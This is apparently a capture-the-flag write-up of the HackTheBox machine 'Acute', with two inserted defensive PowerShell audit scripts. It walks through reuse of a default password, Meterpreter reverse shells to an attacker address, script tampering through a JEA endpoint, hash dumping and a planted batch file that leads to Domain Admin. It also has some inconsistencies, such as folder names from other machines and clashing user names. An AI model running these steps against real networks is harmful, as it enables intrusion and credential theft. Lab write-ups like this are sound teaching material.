Acute is a hard Windows machine that starts with a website on port 443. The certificate of the website reveals a domain name, atsserver.acute.local. Looking around the website, several employees are mentioned, and with this information it is possible to construct a list of possible users on the remote machine. Enumerating the website reveals a form with procedures regarding newcomers to the company. The form reveals the default password that all accounts are initially set up with. It also reveals a link for a Windows PowerShell Web Access (PSWA) session. Combining all the available information from the enumeration process, an attacker is able to get into a PowerShell session as the user edavies on Acute-PC01. Then, it is discovered that the user edavies is also logged on using an interactive session. Upon spying on the actions of edavies, the clear text password of the imonks user for ATSSERVER can be retrieved. The user imonks is running under Just Enough Administration (JEA) on ATSSERVER, but even with the limited command set an attacker is able to modify a script on ATSSERVER in order to make edavies a local administrator on Acute-PC01. Now that edavies is a local administrator, the HKLM\sam and HKLM\system hives can be retrieved from the system in order to extract the password hashes of all the users. The administrator hash turns out to be crackable and the clear text password is re-used for awallace on ATSSERVER. The user awallace is able to create BAT scripts in a directory where the user Lois will execute them. Lois has the rights to add imonks to the site_admin group, which in turn has write access to the Domain Admins group. So, after imonks is added to the site_admin group, he can add himself to the Domain Admins group and acquire administrative privileges.
Enumeration
Scope
IP Address: 10.10.11.145
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE
443/tcp open https
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2024-07-22T08:03:32+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* Open ports: 443
* Services: HTTPS
* Important notes: DNS:atsserver.acute.local, DNS:atsserver
First, I added the domain name, FQDN and computer name to my hosts file.
Several users are mentioned on the website, but I need to know the username format.
In the top right of the page, there is a link to a .docx file.
When I clicked it, it downloaded the file to my Kali machine, so I will explore it locally.
Looking at the file details:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ exiftool New_Starter_CheckList_v7.docx
<snip>
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
<snip>
The Creator of the file is FCastle, who is not in my users list, so I will add him first, along with Daniel, by whom the file was modified. It also gave us a hint that the username format is first letter of the first name + last name, so the user list should be like this:
This row tells us that the default password is Password1! and that several users still have this password.
PSWA means PowerShell Web Access, and dc_manage seems to be some kind of restriction (a constrained session configuration).
The last row has a link; when clicked, it takes me to https://atsserver.acute.local/Acute_Staff_Access
At the end, I can see that there is a group named site admin and that Lois has control of it.
Shell as Edavies
Shell ad Edavies
https://atsserver.acute.local/Acute_Staff_Access
It's a PowerShell Web Access console. I have the password, two computer names and several users, so I will try them.
When providing wrong credentials, this message appears
With the user Chall, a different message appears saying that we aren't authorized to connect to that computer name, so I will try the other one.
When I changed the computer name to Acute-PC01 and tried to authenticate as chall, it also failed. However, when I tried with Edavies it took me to the PowerShell console.
Jmorgan and Natasha exist on the machine along with edavies.
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/21/2021 1:01 PM administrator.ACUTE
d----- 12/22/2021 1:26 AM edavies
d----- 12/21/2021 10:50 PM jmorgan
d----- 11/19/2021 9:29 AM Natasha
d-r--- 11/18/2020 11:43 PM Public
PS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==============================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
I wanted to see who is a member of Remote Management Users, but querying the domain group failed, so I switched to querying the local group and got a result.
PS C:\Users> net group "Remote Management Users"
net : This command can be used only on a Windows Domain Controller.
+ CategoryInfo : NotSpecified: (This command ca...ain Controller.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
More help is available by typing NET HELPMSG 3515.
PS C:\Users> net localgroup "Remote Management Users"
Members
-------------------------------------------------------------------------------
ACUTE\edavies
The command completed successfully.
I also looked at the administrators group and found that Jmorgan is a member of it.
PS C:\Users> net localgroup "administrators"
Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
Administrator
I need to upgrade my shell, so I can use either nc or a Meterpreter shell. In our situation, a Meterpreter shell is better, and we will see why after a few steps.
At the root of the file system, there is a non-standard folder, Utils.
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 9:14 AM PerfLogs
d-r--- 12/6/2021 11:06 AM Program Files
d-r--- 12/7/2021 12:43 PM Program Files (x86)
d-r--- 12/21/2021 10:50 PM Users
d----- 1/31/2022 12:29 AM Utils
d----- 12/16/2021 1:23 AM Windows
Viewing the folder permissions, I found that edavies has (M) modify permission, which means he can read, write, execute and delete.
PS C:\> icacls Utils
Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
ACUTE\edavies:(OI)(CI)(M)
BUILTIN\Users:(OI)(CI)(R)
I don't know why this folder exists, but I will work from this folder as I have permissions on it.
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.16.7:443 -> 10.10.11.145:49848) at 2024-07-22 05:06:10 -0400
meterpreter > getuid
Server username: ACUTE\edavies
Shell as imonks
Personally, I didn't know what to do next as no escalation path was clear to me, so I got a hint that you can use the screenshare feature of the Meterpreter session to capture the desktop.
I couldn't run the script as Edavies because he isn't the user who created this file, so I will try to run the script as imonks to get a shell as jmorgan.
But first I will modify this script to send me a shell.
Creating a Meterpreter handler to receive the connection as jmorgan
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:8443
msf6 exploit(multi/handler) > jobs
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://10.10.16.7:8443
I want to modify the wm.ps1 script, so I ran Get-Command to see the available commands I can run.
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... atsserver
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Alias}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Alias cat -> Get-Content atsserver
Alias cd -> Set-Location atsserver
Alias echo -> Write-Output atsserver
Alias ls -> Get-ChildItem atsserver
Alias pwd -> Get-Location atsserver
Alias sc -> Set-Content atsserver
Alias type -> Get-Content atsserver
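The eight cmdlets above are exactly what a JEA role capability allow-list produces, and Set-Content is the one that turns a "read-only" endpoint into a script-tampering primitive. As an added illustration (not the write-up's or the box's real dc_manage files; the module path, report directory and transcript directory are assumptions), here is a role capability that mirrors the weak list beside a hardened one, plus the query a defender runs to audit what a given user can actually execute through the endpoint:

```powershell
# Weak: mirrors the Get-Command output in the write-up. Set-Content lets a
# constrained user rewrite any script that a more privileged account later runs.
$weak = @{
    VisibleCmdlets = 'Get-Alias', 'Get-ChildItem', 'Get-Command', 'Get-Content',
                     'Get-Location', 'Set-Content', 'Set-Location', 'Write-Output'
}

# Hardened: read-only cmdlets only, with -Path pinned to the tree the role needs
# (C:\ATS\Reports is an assumed directory), so nothing can be written or browsed.
$hardened = @{
    VisibleCmdlets = @(
        'Get-Command', 'Write-Output',
        @{ Name = 'Get-ChildItem'; Parameters = @{ Name = 'Path'; ValidatePattern = '^C:\\ATS\\Reports\\' } },
        @{ Name = 'Get-Content';   Parameters = @{ Name = 'Path'; ValidatePattern = '^C:\\ATS\\Reports\\' } }
    )
}

# Role capability files must live in a module's RoleCapabilities folder on PSModulePath.
$roleDir = 'C:\Program Files\WindowsPowerShell\Modules\DcManageJea\RoleCapabilities'
New-Item -ItemType Directory -Force -Path $roleDir | Out-Null
New-PSRoleCapabilityFile -Path "$roleDir\dc_manage.psrc" @hardened   # swap @weak to reproduce the issue

# Session configuration: restricted endpoint, transcripts on, role mapped to the user.
# Caveat: on a domain controller the JEA virtual account is a Domain Admin, so the
# cmdlet allow-list is the only barrier between the caller and the domain.
New-PSSessionConfigurationFile -Path "$env:TEMP\dc_manage.pssc" `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'ACUTE\imonks' = @{ RoleCapabilities = 'dc_manage' } }
Register-PSSessionConfiguration -Name dc_manage -Path "$env:TEMP\dc_manage.pssc" -Force

# Audit: list every write-capable verb a user can reach through the endpoint.
# On the weak role this prints Set-Content; on the hardened one it prints nothing.
(Get-PSSessionCapability -ConfigurationName dc_manage -Username 'ACUTE\imonks').Name |
    Where-Object { $_ -match '^(Set|Add|Remove|New|Invoke|Start|Out)-' }
```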
I will use Set-Content to add the following lines to the script
Invoke-Command -Credential $cred -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.7:8443 -> 10.10.11.145:49786) at 2024-07-22 06:04:23 -0400
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.7:443 -> 10.10.11.145:49848 (172.16.22.2)
2 meterpreter x64/windows ACUTE\jmorgan @ ACUTE-PC01 10.10.16.7:8443 -> 10.10.11.145:49786 (172.16.22.2)
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: ACUTE\jmorgan
PS C:\Users\jmorgan\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Shell as awallace
I will use the hashdump feature to dump the hashes and try to crack them.
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat "C:\Program Files\keepmeon\keepmeon.bat"}
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
Asking ChatGPT about the exact function of that script:
So, I can create a .bat file and get it executed within 5 minutes as Lois, as the comment says. We also saw that Lois is the only user who can add members to the Site_admin group, so I will add jmorgan to that group and get Domain Admins privileges.
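The keepmeon.bat loop above calls every .bat found recursively under its working directory, so the real weakness is that a low-privileged account can write into that tree. As an added audit script (not part of the write-up; the root path is a placeholder), this enumerates every directory and .bat file under a root where an identity other than SYSTEM, Administrators or TrustedInstaller holds write, delete or ownership rights, which is exactly what a scheduled runner like this one would pick up:

```powershell
# Audit helper: which identities can plant or modify .bat files under $Root?
function Find-WritableBatchFiles {
    param(
        [string]$Root = 'C:\Program Files\keepmeon',   # placeholder root
        [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                               'NT SERVICE\TrustedInstaller')
    )
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # Only write-class bits; Modify/FullControl would also match read-only ACEs.
    $writeBits = [int]($fsr::Write -bor $fsr::Delete -bor $fsr::ChangePermissions -bor
                       $fsr::TakeOwnership -bor $fsr::DeleteSubdirectoriesAndFiles)
    # Inherited ACEs sometimes carry generic rights instead of specific ones.
    $genericWrite = 0x50000000   # GENERIC_ALL | GENERIC_WRITE

    # Directories matter as much as files: a writable directory lets anyone drop a
    # new .bat that 'for /R %%x in (*.bat)' will call on the next run.
    $items = @(Get-Item -Path $Root) + @(Get-ChildItem -Path $Root -Recurse -Force |
        Where-Object { $_.PSIsContainer -or $_.Extension -ieq '.bat' })

    foreach ($item in $items) {
        (Get-Acl -Path $item.FullName).Access |
            Where-Object {
                $raw = [int]$_.FileSystemRights
                $_.AccessControlType -eq 'Allow' -and
                $Trusted -notcontains $_.IdentityReference.Value -and
                ((($raw -band $writeBits) -ne 0) -or (($raw -band $genericWrite) -ne 0))
            } |
            ForEach-Object {
                [pscustomobject]@{
                    Path     = $item.FullName
                    Identity = $_.IdentityReference.Value
                    Rights   = $_.FileSystemRights
                }
            }
    }
}

Find-WritableBatchFiles | Format-Table -AutoSize
```

Any row returned for a non-administrative identity means that account controls code executed under whatever context runs keepmeon.bat; the fix is to restrict the tree to the runner's own account and to stop the script from calling files it does not own.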
The comment field says that the site_admin group has access to domain admins
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
The command completed successfully.
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.